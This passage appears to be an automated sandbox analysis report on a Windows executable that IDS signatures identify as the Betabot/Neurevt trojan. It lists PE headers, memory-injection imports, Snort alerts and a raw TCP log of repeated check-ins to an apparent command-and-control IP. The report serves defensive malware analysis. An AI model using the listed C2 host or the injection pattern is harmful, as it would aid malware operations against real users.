                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x250000x18.reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x18.rdata
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x10000x89e0xa00False0.629296875data5.893874453577146IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .rdata0x20000x1e60x200False0.3046875data2.345775184986294IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .rsrc0x30000x215640x21600False0.9925239934456929data7.938852680335222IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc0x250000x360x200False0.072265625data0.3427863039007212IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                      Resources

                      NameRVASizeTypeLanguageCountry
                      RT_BITMAP0x30ac0x21248data
                      RT_MANIFEST0x242f40x26eASCII text, with CRLF line terminatorsEnglishUnited States

                      Imports

                      DLLImport
                      KERNEL32.dllExitProcess, GetModuleHandleW, VirtualFreeEx, VirtualProtectEx, VirtualAllocEx

                      Possible Origin

                      Language of compilation systemCountry where language is spokenMap
                      EnglishUnited States

                      Network Behavior

                      Snort IDS Alerts

                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                      192.168.2.564.70.19.20349701802018784 12/05/22-12:47:50.129126TCP2018784ET TROJAN Win32/Neurevt.A/Betabot Check-in 44970180192.168.2.564.70.19.203
                      192.168.2.564.70.19.20349704802018784 12/05/22-12:48:05.503144TCP2018784ET TROJAN Win32/Neurevt.A/Betabot Check-in 44970480192.168.2.564.70.19.203
                      192.168.2.58.8.8.850295532016778 12/05/22-12:47:00.505069UDP2016778ET DNS Query to a *.pw domain - Likely Hostile5029553192.168.2.58.8.8.8
                      192.168.2.58.8.8.858218532016778 12/05/22-12:46:19.368387UDP2016778ET DNS Query to a *.pw domain - Likely Hostile5821853192.168.2.58.8.8.8
                      192.168.2.564.70.19.20349700802023765 12/05/22-12:47:43.551273TCP2023765ET TROJAN Betabot Checkin 54970080192.168.2.564.70.19.203
                      192.168.2.58.8.8.850902532016778 12/05/22-12:47:52.321288UDP2016778ET DNS Query to a *.pw domain - Likely Hostile5090253192.168.2.58.8.8.8
                      192.168.2.58.8.8.853555532016778 12/05/22-12:47:58.149920UDP2016778ET DNS Query to a *.pw domain - Likely Hostile5355553192.168.2.58.8.8.8
                      192.168.2.564.70.19.20349694802023765 12/05/22-12:47:04.219546TCP2023765ET TROJAN Betabot Checkin 54969480192.168.2.564.70.19.203
                      192.168.2.564.70.19.20349694802807970 12/05/22-12:47:04.219546TCP2807970ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 34969480192.168.2.564.70.19.203
                      192.168.2.564.70.19.20349697802018784 12/05/22-12:47:24.377403TCP2018784ET TROJAN Win32/Neurevt.A/Betabot Check-in 44969780192.168.2.564.70.19.203
                      192.168.2.564.70.19.20349697802807970 12/05/22-12:47:24.377403TCP2807970ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 34969780192.168.2.564.70.19.203
                      192.168.2.564.70.19.20349703802023765 12/05/22-12:48:00.735136TCP2023765ET TROJAN Betabot Checkin 54970380192.168.2.564.70.19.203
                      192.168.2.564.70.19.20349696802023765 12/05/22-12:47:16.077326TCP2023765ET TROJAN Betabot Checkin 54969680192.168.2.564.70.19.203
                      192.168.2.564.70.19.20349699802023765 12/05/22-12:47:37.686543TCP2023765ET TROJAN Betabot Checkin 54969980192.168.2.564.70.19.203
                      192.168.2.564.70.19.20349694802018784 12/05/22-12:47:04.219546TCP2018784ET TROJAN Win32/Neurevt.A/Betabot Check-in 44969480192.168.2.564.70.19.203
                      192.168.2.564.70.19.20349701802807970 12/05/22-12:47:50.129126TCP2807970ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 34970180192.168.2.564.70.19.203
                      192.168.2.58.8.8.854585532016778 12/05/22-12:48:04.170104UDP2016778ET DNS Query to a *.pw domain - Likely Hostile5458553192.168.2.58.8.8.8
                      192.168.2.564.70.19.20349693802807970 12/05/22-12:46:58.298151TCP2807970ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 34969380192.168.2.564.70.19.203
                      192.168.2.564.70.19.20349699802807970 12/05/22-12:47:37.686543TCP2807970ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 34969980192.168.2.564.70.19.203
                      192.168.2.564.70.19.20349692802018784 12/05/22-12:46:55.095514TCP2018784ET TROJAN Win32/Neurevt.A/Betabot Check-in 44969280192.168.2.564.70.19.203
                      192.168.2.58.8.8.865323532016778 12/05/22-12:47:14.828602UDP2016778ET DNS Query to a *.pw domain - Likely Hostile6532353192.168.2.58.8.8.8
                      192.168.2.58.8.8.851441532016778 12/05/22-12:47:08.104904UDP2016778ET DNS Query to a *.pw domain - Likely Hostile5144153192.168.2.58.8.8.8
                      192.168.2.564.70.19.20349697802023765 12/05/22-12:47:21.944791TCP2023765ET TROJAN Betabot Checkin 54969780192.168.2.564.70.19.203
                      192.168.2.564.70.19.20349700802018784 12/05/22-12:47:43.551273TCP2018784ET TROJAN Win32/Neurevt.A/Betabot Check-in 44970080192.168.2.564.70.19.203
                      192.168.2.564.70.19.20349700802807970 12/05/22-12:47:43.551273TCP2807970ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 34970080192.168.2.564.70.19.203
                      192.168.2.58.8.8.858472532016778 12/05/22-12:47:45.766359UDP2016778ET DNS Query to a *.pw domain - Likely Hostile5847253192.168.2.58.8.8.8
                      192.168.2.564.70.19.20349698802018784 12/05/22-12:47:30.918196TCP2018784ET TROJAN Win32/Neurevt.A/Betabot Check-in 44969880192.168.2.564.70.19.203
                      192.168.2.564.70.19.20349693802018784 12/05/22-12:46:58.298151TCP2018784ET TROJAN Win32/Neurevt.A/Betabot Check-in 44969380192.168.2.564.70.19.203
                      192.168.2.564.70.19.20349690802018784 12/05/22-12:46:49.744933TCP2018784ET TROJAN Win32/Neurevt.A/Betabot Check-in 44969080192.168.2.564.70.19.203
                      192.168.2.58.8.8.855039532016778 12/05/22-12:47:20.714375UDP2016778ET DNS Query to a *.pw domain - Likely Hostile5503953192.168.2.58.8.8.8
                      192.168.2.564.70.19.20349699802018784 12/05/22-12:47:37.686543TCP2018784ET TROJAN Win32/Neurevt.A/Betabot Check-in 44969980192.168.2.564.70.19.203
                      192.168.2.564.70.19.20349698802807970 12/05/22-12:47:30.918196TCP2807970ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 34969880192.168.2.564.70.19.203
                      192.168.2.564.70.19.20349695802807970 12/05/22-12:47:12.620984TCP2807970ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 34969580192.168.2.564.70.19.203
                      192.168.2.564.70.19.20349696802018784 12/05/22-12:47:18.507456TCP2018784ET TROJAN Win32/Neurevt.A/Betabot Check-in 44969680192.168.2.564.70.19.203
                      192.168.2.58.8.8.852688532016778 12/05/22-12:47:39.883458UDP2016778ET DNS Query to a *.pw domain - Likely Hostile5268853192.168.2.58.8.8.8
                      192.168.2.58.8.8.856263532016778 12/05/22-12:47:33.137125UDP2016778ET DNS Query to a *.pw domain - Likely Hostile5626353192.168.2.58.8.8.8
                      192.168.2.564.70.19.20349702802807970 12/05/22-12:47:55.956294TCP2807970ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 34970280192.168.2.564.70.19.203
                      192.168.2.564.70.19.20349692802807970 12/05/22-12:46:55.095514TCP2807970ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 34969280192.168.2.564.70.19.203
                      192.168.2.564.70.19.20349704802807970 12/05/22-12:48:05.503144TCP2807970ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 34970480192.168.2.564.70.19.203
                      192.168.2.564.70.19.20349690802807970 12/05/22-12:46:49.744933TCP2807970ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 34969080192.168.2.564.70.19.203
                      192.168.2.564.70.19.20349701802023765 12/05/22-12:47:50.129126TCP2023765ET TROJAN Betabot Checkin 54970180192.168.2.564.70.19.203
                      192.168.2.564.70.19.20349702802018784 12/05/22-12:47:55.956294TCP2018784ET TROJAN Win32/Neurevt.A/Betabot Check-in 44970280192.168.2.564.70.19.203
                      192.168.2.564.70.19.20349703802018784 12/05/22-12:48:01.952443TCP2018784ET TROJAN Win32/Neurevt.A/Betabot Check-in 44970380192.168.2.564.70.19.203
                      192.168.2.564.70.19.20349695802018784 12/05/22-12:47:12.620984TCP2018784ET TROJAN Win32/Neurevt.A/Betabot Check-in 44969580192.168.2.564.70.19.203
                      192.168.2.58.8.8.856682532016778 12/05/22-12:47:26.631484UDP2016778ET DNS Query to a *.pw domain - Likely Hostile5668253192.168.2.58.8.8.8
                      192.168.2.564.70.19.20349695802023765 12/05/22-12:47:12.620984TCP2023765ET TROJAN Betabot Checkin 54969580192.168.2.564.70.19.203
                      192.168.2.564.70.19.20349702802023765 12/05/22-12:47:54.752098TCP2023765ET TROJAN Betabot Checkin 54970280192.168.2.564.70.19.203
                      192.168.2.564.70.19.20349696802807970 12/05/22-12:47:18.507456TCP2807970ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 34969680192.168.2.564.70.19.203
                      192.168.2.564.70.19.20349703802807970 12/05/22-12:48:01.952443TCP2807970ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 34970380192.168.2.564.70.19.203

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Dec 5, 2022 12:46:49.572079897 CET4969080192.168.2.564.70.19.203
                      Dec 5, 2022 12:46:49.744702101 CET804969064.70.19.203192.168.2.5
                      Dec 5, 2022 12:46:49.744813919 CET4969080192.168.2.564.70.19.203
                      Dec 5, 2022 12:46:49.744932890 CET4969080192.168.2.564.70.19.203
                      Dec 5, 2022 12:46:49.745218039 CET4969080192.168.2.564.70.19.203
                      Dec 5, 2022 12:46:49.917570114 CET804969064.70.19.203192.168.2.5
                      Dec 5, 2022 12:46:49.917643070 CET804969064.70.19.203192.168.2.5
                      Dec 5, 2022 12:46:49.917704105 CET4969080192.168.2.564.70.19.203
                      Dec 5, 2022 12:46:49.957252026 CET804969064.70.19.203192.168.2.5
                      Dec 5, 2022 12:46:51.917339087 CET804969064.70.19.203192.168.2.5
                      Dec 5, 2022 12:46:51.917474985 CET4969080192.168.2.564.70.19.203
                      Dec 5, 2022 12:46:52.922173023 CET4969080192.168.2.564.70.19.203
                      Dec 5, 2022 12:46:53.095259905 CET804969064.70.19.203192.168.2.5
                      Dec 5, 2022 12:46:54.924660921 CET4969280192.168.2.564.70.19.203
                      Dec 5, 2022 12:46:55.095139027 CET804969264.70.19.203192.168.2.5
                      Dec 5, 2022 12:46:55.095240116 CET4969280192.168.2.564.70.19.203
                      Dec 5, 2022 12:46:55.095514059 CET4969280192.168.2.564.70.19.203
                      Dec 5, 2022 12:46:55.095606089 CET4969280192.168.2.564.70.19.203
                      Dec 5, 2022 12:46:55.266019106 CET804969264.70.19.203192.168.2.5
                      Dec 5, 2022 12:46:55.266063929 CET804969264.70.19.203192.168.2.5
                      Dec 5, 2022 12:46:55.266133070 CET4969280192.168.2.564.70.19.203
                      Dec 5, 2022 12:46:55.305445910 CET804969264.70.19.203192.168.2.5
                      Dec 5, 2022 12:46:57.266345978 CET804969264.70.19.203192.168.2.5
                      Dec 5, 2022 12:46:57.271364927 CET4969280192.168.2.564.70.19.203
                      Dec 5, 2022 12:46:58.123863935 CET4969280192.168.2.564.70.19.203
                      Dec 5, 2022 12:46:58.125411987 CET4969380192.168.2.564.70.19.203
                      Dec 5, 2022 12:46:58.295351028 CET804969264.70.19.203192.168.2.5
                      Dec 5, 2022 12:46:58.297549009 CET804969364.70.19.203192.168.2.5
                      Dec 5, 2022 12:46:58.298115969 CET4969380192.168.2.564.70.19.203
                      Dec 5, 2022 12:46:58.298151016 CET4969380192.168.2.564.70.19.203
                      Dec 5, 2022 12:46:58.298513889 CET4969380192.168.2.564.70.19.203
                      Dec 5, 2022 12:46:58.470238924 CET804969364.70.19.203192.168.2.5
                      Dec 5, 2022 12:46:58.470284939 CET804969364.70.19.203192.168.2.5
                      Dec 5, 2022 12:46:58.470413923 CET4969380192.168.2.564.70.19.203
                      Dec 5, 2022 12:46:58.510446072 CET804969364.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:00.471040010 CET804969364.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:00.471113920 CET4969380192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:01.565207958 CET4969380192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:01.565963030 CET4969480192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:01.736680984 CET804969364.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:01.737098932 CET804969464.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:01.737196922 CET4969480192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:01.737490892 CET4969480192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:01.737490892 CET4969480192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:01.909019947 CET804969464.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:01.909091949 CET804969464.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:01.909267902 CET4969480192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:01.948992968 CET804969464.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:02.958908081 CET4969480192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:02.959630966 CET4969480192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:03.130127907 CET804969464.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:03.130175114 CET804969464.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:03.130300045 CET4969480192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:03.171763897 CET804969464.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:04.219546080 CET4969480192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:04.219605923 CET4969480192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:04.390809059 CET804969464.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:04.390849113 CET804969464.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:04.544121981 CET804969464.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:04.544311047 CET4969480192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:06.546979904 CET804969464.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:06.547162056 CET4969480192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:09.211033106 CET4969480192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:09.211504936 CET4969580192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:09.385176897 CET804969464.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:09.385379076 CET804969564.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:09.385493994 CET4969580192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:09.385588884 CET4969580192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:09.385744095 CET4969580192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:09.556554079 CET804969564.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:09.556687117 CET804969564.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:09.799597025 CET804969564.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:09.799815893 CET4969580192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:11.178157091 CET4969580192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:11.178157091 CET4969580192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:11.349312067 CET804969564.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:11.349339008 CET804969564.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:11.349355936 CET804969564.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:11.349729061 CET4969580192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:12.620984077 CET4969580192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:12.621218920 CET4969580192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:12.792326927 CET804969564.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:12.792449951 CET4969580192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:12.831621885 CET804969564.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:14.792490005 CET804969564.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:14.792857885 CET4969580192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:15.904850960 CET4969580192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:15.905292988 CET4969680192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:16.076464891 CET804969564.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:16.076494932 CET804969664.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:16.076598883 CET4969680192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:16.077326059 CET4969680192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:16.077361107 CET4969680192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:16.248631001 CET804969664.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:16.248660088 CET804969664.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:16.248684883 CET804969664.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:16.248790026 CET4969680192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:17.283337116 CET4969680192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:17.283370972 CET4969680192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:17.454430103 CET804969664.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:17.454658031 CET4969680192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:17.495986938 CET804969664.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:18.507456064 CET4969680192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:18.507813931 CET4969680192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:18.678489923 CET804969664.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:18.678555965 CET804969664.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:18.678654909 CET4969680192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:18.718775988 CET804969664.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:20.678850889 CET804969664.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:20.680202961 CET4969680192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:21.771080971 CET4969680192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:21.771768093 CET4969780192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:21.942322969 CET804969664.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:21.944523096 CET804969764.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:21.944636106 CET4969780192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:21.944791079 CET4969780192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:21.945249081 CET4969780192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:22.117480993 CET804969764.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:22.117517948 CET804969764.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:22.117733955 CET4969780192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:22.157074928 CET804969764.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:23.158463001 CET4969780192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:23.158523083 CET4969780192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:23.331326962 CET804969764.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:23.331394911 CET804969764.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:23.331532001 CET4969780192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:23.378667116 CET804969764.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:24.377403021 CET4969780192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:24.377502918 CET4969780192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:24.550355911 CET804969764.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:24.550390005 CET804969764.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:24.599602938 CET804969764.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:24.601144075 CET4969780192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:26.599320889 CET804969764.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:26.600683928 CET4969780192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:27.690212011 CET4969780192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:27.690952063 CET4969880192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:27.862132072 CET804969864.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:27.862449884 CET4969880192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:27.862853050 CET804969764.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:27.881628036 CET4969880192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:27.881628036 CET4969880192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:28.052911997 CET804969864.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:28.052932024 CET804969864.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:28.057729006 CET4969880192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:28.093781948 CET804969864.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:29.304999113 CET4969880192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:29.304999113 CET4969880192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:29.476490974 CET804969864.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:29.476525068 CET804969864.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:29.759772062 CET804969864.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:29.760016918 CET4969880192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:30.918195963 CET4969880192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:30.918195963 CET4969880192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:31.099086046 CET804969864.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:31.099118948 CET804969864.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:31.099140882 CET804969864.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:31.099214077 CET4969880192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:33.099086046 CET804969864.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:33.099236012 CET4969880192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:34.250929117 CET4969880192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:34.251444101 CET4969980192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:34.422483921 CET804969864.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:34.422770977 CET804969964.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:34.422990084 CET4969980192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:34.423048973 CET4969980192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:34.423048973 CET4969980192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:34.595274925 CET804969964.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:34.595304966 CET804969964.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:34.992084980 CET804969964.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:34.993180037 CET4969980192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:36.042872906 CET4969980192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:36.042874098 CET4969980192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:36.474066019 CET4969980192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:36.645586014 CET804969964.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:36.645634890 CET804969964.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:36.645962000 CET4969980192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:37.686542988 CET4969980192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:37.686594963 CET4969980192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:37.857892036 CET804969964.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:37.857947111 CET804969964.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:37.858175993 CET4969980192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:39.857206106 CET804969964.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:39.857304096 CET4969980192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:40.941499949 CET4969980192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:40.941994905 CET4970080192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:41.112682104 CET804969964.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:41.112859964 CET804970064.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:41.113059998 CET4970080192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:41.113176107 CET4970080192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:41.113193989 CET4970080192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:41.284473896 CET804970064.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:41.284538031 CET804970064.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:41.284811974 CET4970080192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:41.324163914 CET804970064.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:42.314713001 CET4970080192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:42.315095901 CET4970080192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:42.493643045 CET804970064.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:42.493673086 CET804970064.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:42.493768930 CET4970080192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:42.527684927 CET804970064.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:43.551273108 CET4970080192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:43.551273108 CET4970080192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:43.731388092 CET804970064.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:43.731421947 CET804970064.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:43.731714964 CET4970080192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:43.770843029 CET804970064.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:45.733760118 CET804970064.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:45.733886003 CET4970080192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:46.909368038 CET4970080192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:46.909842014 CET4970180192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:47.080256939 CET804970064.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:47.081667900 CET804970164.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:47.081829071 CET4970180192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:47.406786919 CET4970180192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:47.407196045 CET4970180192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:47.578250885 CET804970164.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:47.578309059 CET804970164.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:47.578428984 CET4970180192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:47.617655993 CET804970164.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:48.927165985 CET4970180192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:48.996059895 CET4970180192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:49.098418951 CET804970164.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:49.098450899 CET804970164.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:49.098560095 CET4970180192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:49.207195044 CET804970164.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:50.129126072 CET4970180192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:50.129240036 CET4970180192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:50.300298929 CET804970164.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:50.300355911 CET804970164.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:50.300452948 CET4970180192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:50.339808941 CET804970164.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:52.300324917 CET804970164.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:52.300932884 CET4970180192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:53.379641056 CET4970180192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:53.380157948 CET4970280192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:53.551043987 CET804970164.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:53.551075935 CET804970264.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:53.551163912 CET4970280192.168.2.564.70.19.203
